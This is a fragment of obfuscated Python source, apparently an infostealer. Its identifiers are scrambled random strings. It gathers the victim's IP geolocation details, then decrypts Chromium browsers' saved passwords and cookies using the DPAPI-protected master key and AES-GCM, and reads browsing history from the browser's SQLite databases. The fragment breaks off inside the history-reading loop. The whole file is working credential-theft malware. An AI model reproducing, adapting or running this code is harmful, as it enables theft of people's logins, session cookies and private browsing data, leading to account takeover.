    QPYNTZXJVEHSXUIZNKXVGVRYRCOIAFMXSDZKEWPKYNWRAULIRVIDDRBUVTYSRWRWGQIHHDXA = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('regionName', "None")
    QPYNTZXJVEHSXUIZNKXVGVRYRCOIAFMXSDZKEWPKYNWRAULIRVIDDRBUVTYSRWRWGQIHHDXA_code = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('region', "None")
    XAMTPOYRAWBKLMQLRQCRBOXBHKLHIWNFZTEENIZKYZHSVOCFTYBB = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('zip', "None")
    HDTYHDKZVZFQGPVZYDCUYVNAQSAORZVGCZDNHMMCYDBCMVVTMQZUTHSRWJFLZWTIEQJXWXULYCB = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('city', "None")
    COSWGEHBMHFEJHNKJAOUBOMHADOKQDJFIWKEQGLCUNGTNVMHXYOHSAKSZNWAQTLCWDHPKRWVXJSZUNKSYD = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('lat', "None")
    THOZGMHZOXUABCZUVBZXHEJREQAVOTYSYEMDLHGEYKAXNESOVXHTQCZFFNSIKGUGQUJYAGDRWLCDHH = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('lon', "None")
    GLNKVCTGGCZSHGUYZWWCATUWAHRHQWLPPDNBHVDTHKHCVCBHEDWCEYYWMVYSZZ = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('timezone', "None")
    HFBPHTSBSSLBHBWKZWWOPRVUZUIIMPJKBTGSRIDQLNOWTTSKEA = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('isp', "None")
    HOBMUEQQNQSQIMDCZLKPUIOUJJMQGYCGFLGUYURGXGDTSMMBPCKUAUWEZ = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('org', "None")
    XSRDIZPFIKJDOMIVZQNAADYOIUCJYKQBOZZDSCBDXQBPQRURHDJHXUWKWZTTIVZPSFGZWBSIYMHQTDKDIJVXL = CQXQAPHMAFCGBCXZVFOUNYXIIIOBQTGBXGJTFMCDZISEDFDGYUGNTUVGCVVGLQIXCYHNCNLCQDPKNCEIQVPRQEWNHN.get('as', "None")

def BGPQOVPXHZJSXYIATWRLRVSEDATUWZKDXOOLRSCINIEGZTCVKAYUQS(ODTDEUIVQZQLNXFUHQPXMQTZOLAGDUEPJBHTCMXULZPAFSETSAWKTIK):
    import os
    import psutil
    import json
    import base64
    import sqlite3
    import win32crypt
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    global SZDNITIHXGYVWRSLDZEAWADAKSFGQSCOTISOFHRHHXPEJALPKRFMQFRCAKLMHTQXGHTXWDGFFDCEFHEOVWFIRYOAPYXBLFCFDOQQ, KAQPNBIKWBDBUSAZDKJHICRDYMPBFPMOJKCGXLKQTMUTGKEJBCQUOVAMHGDEFWSDFWHVVRDEMV, LOXNIATXFGKVVPIGVYMNVPRQXBSRQOVUGYUQXQPGHOJQBQVICPXPSRWPRRVVVTOWUSQPIUQNLFPWBPZFJZLKTRVHEWIXZNGESQ, EDHKUCJWZSHFYVTMOEKQRLPJWMZJVWVOJJMQYXCYLCRXCGNFOBIFVSPVHZRCJJJSXYHSGDPQSKHMJYGOROWTUPWPWMMEHVCDZTO, ZOUAHFWPNYVIFMFRCJTFXEEIDNIYPISMUJXJKSQIOWREYKUNFSEHJSMCFNTMQTYXKLWWZYIQEALQIHLWNMZYTROYSFANWKUHU, UVRHHSACUEEKHJTWBAPEMLWSOOOLFKTLNBPXCWZEZVLEIUQULXORVRNWABELDPIEJY

    IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS = ["passwords"]
    AXVPJOOELLSBXHSHBADOFYLRFMZBPRDOTIHGWTDXVWXSOIEBTYLVWKBGJLUJBHRVVMZLVZNIDQWCQIVHKTPYUTWASZ = []

    if "extentions" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
        SZDNITIHXGYVWRSLDZEAWADAKSFGQSCOTISOFHRHHXPEJALPKRFMQFRCAKLMHTQXGHTXWDGFFDCEFHEOVWFIRYOAPYXBLFCFDOQQ = 0
    else:
        SZDNITIHXGYVWRSLDZEAWADAKSFGQSCOTISOFHRHHXPEJALPKRFMQFRCAKLMHTQXGHTXWDGFFDCEFHEOVWFIRYOAPYXBLFCFDOQQ = None

    if "passwords" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
        VVDVSCUZAUXSHKFOEAYCCWGOZXYMGFSHACVBRGNPWQTMJDOQRWHOQUWWOAZZDAATIZKLLYDHSBYTEICNSTNQFMDDI = []
        KAQPNBIKWBDBUSAZDKJHICRDYMPBFPMOJKCGXLKQTMUTGKEJBCQUOVAMHGDEFWSDFWHVVRDEMV = 0
    else:
        VVDVSCUZAUXSHKFOEAYCCWGOZXYMGFSHACVBRGNPWQTMJDOQRWHOQUWWOAZZDAATIZKLLYDHSBYTEICNSTNQFMDDI = ""
        KAQPNBIKWBDBUSAZDKJHICRDYMPBFPMOJKCGXLKQTMUTGKEJBCQUOVAMHGDEFWSDFWHVVRDEMV = None
    if "cookies" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
        TNAOWXOYWYAWXDOWCMIBXZTQHVFTSVSKGYNKORVACRQILYEFXWBVBOGIIQAUPSOPDGVFFEKEJNPFSJDMBTW = []
        LOXNIATXFGKVVPIGVYMNVPRQXBSRQOVUGYUQXQPGHOJQBQVICPXPSRWPRRVVVTOWUSQPIUQNLFPWBPZFJZLKTRVHEWIXZNGESQ = 0
    else:
        TNAOWXOYWYAWXDOWCMIBXZTQHVFTSVSKGYNKORVACRQILYEFXWBVBOGIIQAUPSOPDGVFFEKEJNPFSJDMBTW = ""
        LOXNIATXFGKVVPIGVYMNVPRQXBSRQOVUGYUQXQPGHOJQBQVICPXPSRWPRRVVVTOWUSQPIUQNLFPWBPZFJZLKTRVHEWIXZNGESQ = None
    if "history" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
        QDSUNTGMSJUFCUPQELVYNXGTBTBKLUKWEVECCAOZQKEGGUTYOVXAVMQSVSDMEFIBWAZKAVALVYAVWWAHNZHFUYUMRDQJY = []
        EDHKUCJWZSHFYVTMOEKQRLPJWMZJVWVOJJMQYXCYLCRXCGNFOBIFVSPVHZRCJJJSXYHSGDPQSKHMJYGOROWTUPWPWMMEHVCDZTO = 0
    else:
        QDSUNTGMSJUFCUPQELVYNXGTBTBKLUKWEVECCAOZQKEGGUTYOVXAVMQSVSDMEFIBWAZKAVALVYAVWWAHNZHFUYUMRDQJY = ""
        EDHKUCJWZSHFYVTMOEKQRLPJWMZJVWVOJJMQYXCYLCRXCGNFOBIFVSPVHZRCJJJSXYHSGDPQSKHMJYGOROWTUPWPWMMEHVCDZTO = None
    if "downloads" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
        CZEQDCTJKCOFEGAMNTQFCELVKWTJZJULAECGXXIKOAUKOPJBXGEQEDTWIVXHUMRLPURTLPRWLEZWLBNPL = []
        ZOUAHFWPNYVIFMFRCJTFXEEIDNIYPISMUJXJKSQIOWREYKUNFSEHJSMCFNTMQTYXKLWWZYIQEALQIHLWNMZYTROYSFANWKUHU = 0
    else:
        CZEQDCTJKCOFEGAMNTQFCELVKWTJZJULAECGXXIKOAUKOPJBXGEQEDTWIVXHUMRLPURTLPRWLEZWLBNPL = ""
        ZOUAHFWPNYVIFMFRCJTFXEEIDNIYPISMUJXJKSQIOWREYKUNFSEHJSMCFNTMQTYXKLWWZYIQEALQIHLWNMZYTROYSFANWKUHU = None
    if "cards" in IEHYYKHNXQZRSZVSGWKGSIAMSEBIRLZZJXMXCDMDOWZNHBNWXSIS:
        PEDGQYITHYUFZNGMWCUMSAWKQKAGMSSUHAUUWHNEVCSURMDVYLVA = []
        UVRHHSACUEEKHJTWBAPEMLWSOOOLFKTLNBPXCWZEZVLEIUQULXORVRNWABELDPIEJY = 0
    else:
        PEDGQYITHYUFZNGMWCUMSAWKQKAGMSSUHAUUWHNEVCSURMDVYLVA = ""
        UVRHHSACUEEKHJTWBAPEMLWSOOOLFKTLNBPXCWZEZVLEIUQULXORVRNWABELDPIEJY = None
    
    def LRBHWCEDMSDHVKQQPTVLRQXHYFLOQLWPGODAERSJSRZYHIZLFNNYHZVWQIMINUTQTOEKZLXLNXNOTTXYIGVZFTOQPKGKS(MLWJGPXJBJJXSIQFDDUNVXUVRQAHQKSRYIEKLUGQMLBNCCHDCRXYMHQJSFRYPFHOEAKXCYCLRCFLXKQ):
        if not os.path.exists(MLWJGPXJBJJXSIQFDDUNVXUVRQAHQKSRYIEKLUGQMLBNCCHDCRXYMHQJSFRYPFHOEAKXCYCLRCFLXKQ):
            return None

        try:
            with open(MLWJGPXJBJJXSIQFDDUNVXUVRQAHQKSRYIEKLUGQMLBNCCHDCRXYMHQJSFRYPFHOEAKXCYCLRCFLXKQ, 'r', encoding='utf-8') as v4r_f:
                WJCTMUGYYVQHJVNWTEGFLYFCTGNIOUDSLGQTGSBGMWZBYJNTITFJMURPQGGQUFIUJRURPVSDNAMARF = json.load(v4r_f)

            ZTGPQOXUIKAJCNRMVNRYPNKJRARCSCXSVPNLNPSNJHCSFZKOML_key = base64.b64decode(WJCTMUGYYVQHJVNWTEGFLYFCTGNIOUDSLGQTGSBGMWZBYJNTITFJMURPQGGQUFIUJRURPVSDNAMARF["os_crypt"]["encrypted_key"])[5:]
            BUWPAWHFOOWXFZOLHEUGCPXRVSOPVTAJSRNLUAKAHMPRIXMVEQRLPGFRKCIKWIEDUZLJEZSVRWLS = win32crypt.CryptUnprotectData(ZTGPQOXUIKAJCNRMVNRYPNKJRARCSCXSVPNLNPSNJHCSFZKOML_key, None, None, None, 0)[1]
            return BUWPAWHFOOWXFZOLHEUGCPXRVSOPVTAJSRNLUAKAHMPRIXMVEQRLPGFRKCIKWIEDUZLJEZSVRWLS
        except:
            return None

    def JCDUFZZNJAPEWDIKDTOKTXBJPVJJCAHPKXBBRHDLQOREKWKNZTSUGAAUIJKMKKTOELTOWQYOTNFDARIYWLARCAUYWOPRRLVMEMWO(CZDXWXJJBKFGXGMRPTKWPWEVNPHWTLQVMGJKZRIXTTMHGTVSOLHDCJXG, BUWPAWHFOOWXFZOLHEUGCPXRVSOPVTAJSRNLUAKAHMPRIXMVEQRLPGFRKCIKWIEDUZLJEZSVRWLS):
        try:
            SHUAWUJDAKTKDDDOYYNILJVFKDLLQOSBYMOEQSQFUFGYAEHJOQWRPQFCHTVMTBHVKCIJXXJNAVFDUTGWPWTOUYNBJFG = CZDXWXJJBKFGXGMRPTKWPWEVNPHWTLQVMGJKZRIXTTMHGTVSOLHDCJXG[3:15]
            EAXATMPZAEJKTQQUUYMLEUQXMUIHDVLQVSQAILOJKNUWQTSXNHXHUMAMFPOIEKAARPXHBGKCRXAM = CZDXWXJJBKFGXGMRPTKWPWEVNPHWTLQVMGJKZRIXTTMHGTVSOLHDCJXG[15:-16]
            COPDKRZRWCSEXWYXVVNPZUXMAHPZCKEMZNLBGINHJCAFORKDEQSGFGMONZLAPNDOETWCSLVXFIXJSJDLTZDIJTHEAOH = CZDXWXJJBKFGXGMRPTKWPWEVNPHWTLQVMGJKZRIXTTMHGTVSOLHDCJXG[-16:]
            QJHGWEQHNEKZMHOSMTJPVBTHZEIAXZELFYEHCPYTOXPPOIIUFFDIBN = Cipher(algorithms.AES(BUWPAWHFOOWXFZOLHEUGCPXRVSOPVTAJSRNLUAKAHMPRIXMVEQRLPGFRKCIKWIEDUZLJEZSVRWLS), modes.GCM(SHUAWUJDAKTKDDDOYYNILJVFKDLLQOSBYMOEQSQFUFGYAEHJOQWRPQFCHTVMTBHVKCIJXXJNAVFDUTGWPWTOUYNBJFG, COPDKRZRWCSEXWYXVVNPZUXMAHPZCKEMZNLBGINHJCAFORKDEQSGFGMONZLAPNDOETWCSLVXFIXJSJDLTZDIJTHEAOH))
            SOAYYYFCEETCOAANOPXBORIKXACEQZVWYOITXELEQJOHIUJSYEODCBXDPHFFGPEXECXPDUYFRPALXFLTXVPJSSKATFOLGXADQC = QJHGWEQHNEKZMHOSMTJPVBTHZEIAXZELFYEHCPYTOXPPOIIUFFDIBN.decryptor()
            TNLDYDCJCXMTCRHLOIZRAGKHMZKQUQPAZCGHJOIHVMJZJZOQYQSQNQLKEMUALRJRDHBVRYTEBUVOHBDPQPEJDLUEKP = SOAYYYFCEETCOAANOPXBORIKXACEQZVWYOITXELEQJOHIUJSYEODCBXDPHFFGPEXECXPDUYFRPALXFLTXVPJSSKATFOLGXADQC.update(EAXATMPZAEJKTQQUUYMLEUQXMUIHDVLQVSQAILOJKNUWQTSXNHXHUMAMFPOIEKAARPXHBGKCRXAM) + SOAYYYFCEETCOAANOPXBORIKXACEQZVWYOITXELEQJOHIUJSYEODCBXDPHFFGPEXECXPDUYFRPALXFLTXVPJSSKATFOLGXADQC.finalize()
            return TNLDYDCJCXMTCRHLOIZRAGKHMZKQUQPAZCGHJOIHVMJZJZOQYQSQNQLKEMUALRJRDHBVRYTEBUVOHBDPQPEJDLUEKP.decode()
        except:
            return None
        
    def KNCGIGJIBPCVMMPMPHWATMLUUGLTKLLLXCHGPFVTPOEXTIJGDHGJRLSEUXDIXZSFBNPTMFRDQBIJXVHMZJQPZVYMPRHTLBUGHIG(WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS, LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK, BUWPAWHFOOWXFZOLHEUGCPXRVSOPVTAJSRNLUAKAHMPRIXMVEQRLPGFRKCIKWIEDUZLJEZSVRWLS):
        global KAQPNBIKWBDBUSAZDKJHICRDYMPBFPMOJKCGXLKQTMUTGKEJBCQUOVAMHGDEFWSDFWHVVRDEMV
        RSESIIBLDZYJEKBFIPUETATDXGSCEWWVSWXAEQNEBOKRJZLUJFFNHXSYIETODFUW_db = os.path.join(LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK, 'Login Data')
        if not os.path.exists(RSESIIBLDZYJEKBFIPUETATDXGSCEWWVSWXAEQNEBOKRJZLUJFFNHXSYIETODFUW_db):
            return

        WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ = sqlite3.connect(":memory:")
        RTYCELFMTKFZHIZYSYKNMAIFJHMFBAVJCISJWMIJNRPHRSEUMDEBWWJLMQMLNQUIDRWHQA = sqlite3.connect(RSESIIBLDZYJEKBFIPUETATDXGSCEWWVSWXAEQNEBOKRJZLUJFFNHXSYIETODFUW_db)
        RTYCELFMTKFZHIZYSYKNMAIFJHMFBAVJCISJWMIJNRPHRSEUMDEBWWJLMQMLNQUIDRWHQA.backup(WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ)
        RTYCELFMTKFZHIZYSYKNMAIFJHMFBAVJCISJWMIJNRPHRSEUMDEBWWJLMQMLNQUIDRWHQA.close()
        LJKYLEQDZWKDHAXWOZRXSZRHVLWAOOSFJLTRFEHCWLBTKJEWDFTCTKTHSBZYICILBBMDRYCYEUTFLEELKVFYBTMXTSEMKIIWAZUU = WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ.cursor()
        LJKYLEQDZWKDHAXWOZRXSZRHVLWAOOSFJLTRFEHCWLBTKJEWDFTCTKTHSBZYICILBBMDRYCYEUTFLEELKVFYBTMXTSEMKIIWAZUU.execute('SELECT action_url, username_value, password_value FROM logins')

        for v4r_row in LJKYLEQDZWKDHAXWOZRXSZRHVLWAOOSFJLTRFEHCWLBTKJEWDFTCTKTHSBZYICILBBMDRYCYEUTFLEELKVFYBTMXTSEMKIIWAZUU.fetchall():
            if not v4r_row[0] or not v4r_row[1] or not v4r_row[2]:
                continue
            UDYWJKWXXRHOYYHUSNYJRHHLIVKRFXDWLYLRAKIFFXOUFZBSRBNAJPVFFCDPWWZMMBZWNNFUIOJUHPAZNZTT =          f"- Url      : {v4r_row[0]}"
            KNACBVZEZLYMBYBAPEJMDNCFUFMFSAPWKSNRPREMMOABISRAWSIYQDDRPRBKDHEHVCWS =     f"  Username : {v4r_row[1]}"
            RSESIIBLDZYJEKBFIPUETATDXGSCEWWVSWXAEQNEBOKRJZLUJFFNHXSYIETODFUW =     f"  Password : {JCDUFZZNJAPEWDIKDTOKTXBJPVJJCAHPKXBBRHDLQOREKWKNZTSUGAAUIJKMKKTOELTOWQYOTNFDARIYWLARCAUYWOPRRLVMEMWO(v4r_row[2], BUWPAWHFOOWXFZOLHEUGCPXRVSOPVTAJSRNLUAKAHMPRIXMVEQRLPGFRKCIKWIEDUZLJEZSVRWLS)}"
            WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS_name = f"  Browser  : {WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS}"
            VVDVSCUZAUXSHKFOEAYCCWGOZXYMGFSHACVBRGNPWQTMJDOQRWHOQUWWOAZZDAATIZKLLYDHSBYTEICNSTNQFMDDI.append(f"{UDYWJKWXXRHOYYHUSNYJRHHLIVKRFXDWLYLRAKIFFXOUFZBSRBNAJPVFFCDPWWZMMBZWNNFUIOJUHPAZNZTT}\n{KNACBVZEZLYMBYBAPEJMDNCFUFMFSAPWKSNRPREMMOABISRAWSIYQDDRPRBKDHEHVCWS}\n{RSESIIBLDZYJEKBFIPUETATDXGSCEWWVSWXAEQNEBOKRJZLUJFFNHXSYIETODFUW}\n{WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS_name}\n")
            KAQPNBIKWBDBUSAZDKJHICRDYMPBFPMOJKCGXLKQTMUTGKEJBCQUOVAMHGDEFWSDFWHVVRDEMV += 1

        WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ.close()

    def LBJUNIHHUYERLHUQMXFIIURFOMNTBZQACAFTFLNKKMZYKCCORGGWFJMATMWAYEYJOQUHVOGFPTUKXKVIEGTZBDBFAMJWZSYDAH(WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS, LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK, BUWPAWHFOOWXFZOLHEUGCPXRVSOPVTAJSRNLUAKAHMPRIXMVEQRLPGFRKCIKWIEDUZLJEZSVRWLS):
        global LOXNIATXFGKVVPIGVYMNVPRQXBSRQOVUGYUQXQPGHOJQBQVICPXPSRWPRRVVVTOWUSQPIUQNLFPWBPZFJZLKTRVHEWIXZNGESQ
        RKSXWOSFTTXCTTNWOQHHINQSAPZGHGFELDILDPFJYPUJZWLFAJKRMQJUYAKRECADVRVQRUIOUPGOFFKHSTYANLNDPNFL = os.path.join(LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK, 'Network', 'Cookies')
        if not os.path.exists(RKSXWOSFTTXCTTNWOQHHINQSAPZGHGFELDILDPFJYPUJZWLFAJKRMQJUYAKRECADVRVQRUIOUPGOFFKHSTYANLNDPNFL):
            return

        WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ = sqlite3.connect(":memory:")
        RTYCELFMTKFZHIZYSYKNMAIFJHMFBAVJCISJWMIJNRPHRSEUMDEBWWJLMQMLNQUIDRWHQA = sqlite3.connect(RKSXWOSFTTXCTTNWOQHHINQSAPZGHGFELDILDPFJYPUJZWLFAJKRMQJUYAKRECADVRVQRUIOUPGOFFKHSTYANLNDPNFL)
        RTYCELFMTKFZHIZYSYKNMAIFJHMFBAVJCISJWMIJNRPHRSEUMDEBWWJLMQMLNQUIDRWHQA.backup(WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ)
        RTYCELFMTKFZHIZYSYKNMAIFJHMFBAVJCISJWMIJNRPHRSEUMDEBWWJLMQMLNQUIDRWHQA.close()
        LJKYLEQDZWKDHAXWOZRXSZRHVLWAOOSFJLTRFEHCWLBTKJEWDFTCTKTHSBZYICILBBMDRYCYEUTFLEELKVFYBTMXTSEMKIIWAZUU = WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ.cursor()
        LJKYLEQDZWKDHAXWOZRXSZRHVLWAOOSFJLTRFEHCWLBTKJEWDFTCTKTHSBZYICILBBMDRYCYEUTFLEELKVFYBTMXTSEMKIIWAZUU.execute('SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies')

        for v4r_row in LJKYLEQDZWKDHAXWOZRXSZRHVLWAOOSFJLTRFEHCWLBTKJEWDFTCTKTHSBZYICILBBMDRYCYEUTFLEELKVFYBTMXTSEMKIIWAZUU.fetchall():
            if not v4r_row[0] or not v4r_row[1] or not v4r_row[2] or not v4r_row[3]:
                continue
            UDYWJKWXXRHOYYHUSNYJRHHLIVKRFXDWLYLRAKIFFXOUFZBSRBNAJPVFFCDPWWZMMBZWNNFUIOJUHPAZNZTT =          f"- Url     : {v4r_row[0]}"
            PPPUNSYRTZVWSHXMQPBKPQWICBLNGGACTHVLKNMATWXPRCSDKXOESUPDDFIVTEXAEYYFYQCQKOVDXYFJTIQUGUYIXDIDWYZKDNV =         f"  Name    : {v4r_row[1]}"
            MLWJGPXJBJJXSIQFDDUNVXUVRQAHQKSRYIEKLUGQMLBNCCHDCRXYMHQJSFRYPFHOEAKXCYCLRCFLXKQ =         f"  Path    : {v4r_row[2]}"
            CPWUNYJNRBNRTKGJEEWVZFHZKXDWCPSXVKVQZVFCBISXUJGOTBSCIPDGPREQFKMCQQAOFQESOMCZHAWVJUT =       f"  Cookie  : {JCDUFZZNJAPEWDIKDTOKTXBJPVJJCAHPKXBBRHDLQOREKWKNZTSUGAAUIJKMKKTOELTOWQYOTNFDARIYWLARCAUYWOPRRLVMEMWO(v4r_row[3], BUWPAWHFOOWXFZOLHEUGCPXRVSOPVTAJSRNLUAKAHMPRIXMVEQRLPGFRKCIKWIEDUZLJEZSVRWLS)}"
            VECNXXXCUCRIAMMSRBZPMXJTLTVGAMBLULTKAGJJHAZLAAFEDKPWGQKMJBJYYLPJUVMCSTIJXIVWVCOXBVJPENIWOEEMFXXJHXKN =       f"  Expire  : {v4r_row[4]}"
            WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS_name = f"  Browser : {WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS}"
            TNAOWXOYWYAWXDOWCMIBXZTQHVFTSVSKGYNKORVACRQILYEFXWBVBOGIIQAUPSOPDGVFFEKEJNPFSJDMBTW.append(f"{UDYWJKWXXRHOYYHUSNYJRHHLIVKRFXDWLYLRAKIFFXOUFZBSRBNAJPVFFCDPWWZMMBZWNNFUIOJUHPAZNZTT}\n{PPPUNSYRTZVWSHXMQPBKPQWICBLNGGACTHVLKNMATWXPRCSDKXOESUPDDFIVTEXAEYYFYQCQKOVDXYFJTIQUGUYIXDIDWYZKDNV}\n{MLWJGPXJBJJXSIQFDDUNVXUVRQAHQKSRYIEKLUGQMLBNCCHDCRXYMHQJSFRYPFHOEAKXCYCLRCFLXKQ}\n{CPWUNYJNRBNRTKGJEEWVZFHZKXDWCPSXVKVQZVFCBISXUJGOTBSCIPDGPREQFKMCQQAOFQESOMCZHAWVJUT}\n{VECNXXXCUCRIAMMSRBZPMXJTLTVGAMBLULTKAGJJHAZLAAFEDKPWGQKMJBJYYLPJUVMCSTIJXIVWVCOXBVJPENIWOEEMFXXJHXKN}\n{WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS_name}\n")
            LOXNIATXFGKVVPIGVYMNVPRQXBSRQOVUGYUQXQPGHOJQBQVICPXPSRWPRRVVVTOWUSQPIUQNLFPWBPZFJZLKTRVHEWIXZNGESQ += 1

        WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ.close()

    def GONCEYEAZVHWOHAFLHFREQUZKHMYKMWLXRWJXVWQPLZVHHMLKQOATYUIBBRLHX(WCZSUTBNBVFRHQXCWHQAYMEBNJWYMHFBSWXDNNLSMUJRDCVHQGJBEDJTJMOHLSYXOZCWRBRXMEHOJKPPPLWEZS, LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK):
        global EDHKUCJWZSHFYVTMOEKQRLPJWMZJVWVOJJMQYXCYLCRXCGNFOBIFVSPVHZRCJJJSXYHSGDPQSKHMJYGOROWTUPWPWMMEHVCDZTO
        HTQPDRZOEWIPBZSEKSUAYEAPNHINPIMEZARZIVRKTMUZIFTHGPGBCLANXYGQZOJYB = os.path.join(LKJZNUGIGNLXEMIMJADPXGRUYBQZTDWFVDVBEUYNWHKEBPDEPZNPYWMKPVDPSOSSZGLUIZFGZSAJYOKHTNTTK, 'History')
        if not os.path.exists(HTQPDRZOEWIPBZSEKSUAYEAPNHINPIMEZARZIVRKTMUZIFTHGPGBCLANXYGQZOJYB):
            return
        
        WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ = sqlite3.connect(":memory:")
        RTYCELFMTKFZHIZYSYKNMAIFJHMFBAVJCISJWMIJNRPHRSEUMDEBWWJLMQMLNQUIDRWHQA = sqlite3.connect(HTQPDRZOEWIPBZSEKSUAYEAPNHINPIMEZARZIVRKTMUZIFTHGPGBCLANXYGQZOJYB)
        RTYCELFMTKFZHIZYSYKNMAIFJHMFBAVJCISJWMIJNRPHRSEUMDEBWWJLMQMLNQUIDRWHQA.backup(WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ)
        RTYCELFMTKFZHIZYSYKNMAIFJHMFBAVJCISJWMIJNRPHRSEUMDEBWWJLMQMLNQUIDRWHQA.close()
        LJKYLEQDZWKDHAXWOZRXSZRHVLWAOOSFJLTRFEHCWLBTKJEWDFTCTKTHSBZYICILBBMDRYCYEUTFLEELKVFYBTMXTSEMKIIWAZUU = WIUUSUVUGPZKFCWCUEPRSTVSSYRQOAUBBTDJVMNFWNMDBPFGROXFMIRNIKQ.cursor()
        LJKYLEQDZWKDHAXWOZRXSZRHVLWAOOSFJLTRFEHCWLBTKJEWDFTCTKTHSBZYICILBBMDRYCYEUTFLEELKVFYBTMXTSEMKIIWAZUU.execute('SELECT url, title, last_visit_time FROM urls')

        for v4r_row in LJKYLEQDZWKDHAXWOZRXSZRHVLWAOOSFJLTRFEHCWLBTKJEWDFTCTKTHSBZYICILBBMDRYCYEUTFLEELKVFYBTMXTSEMKIIWAZUU.fetchall():
            if not v4r_row[0] or not v4r_row[1] or not v4r_row[2]:
                continue
            UDYWJKWXXRHOYYHUSNYJRHHLIVKRFXDWLYLRAKIFFXOUFZBSRBNAJPVFFCDPWWZMMBZWNNFUIOJUHPAZNZTT =          f"- Url     : {v4r_row[0]}"
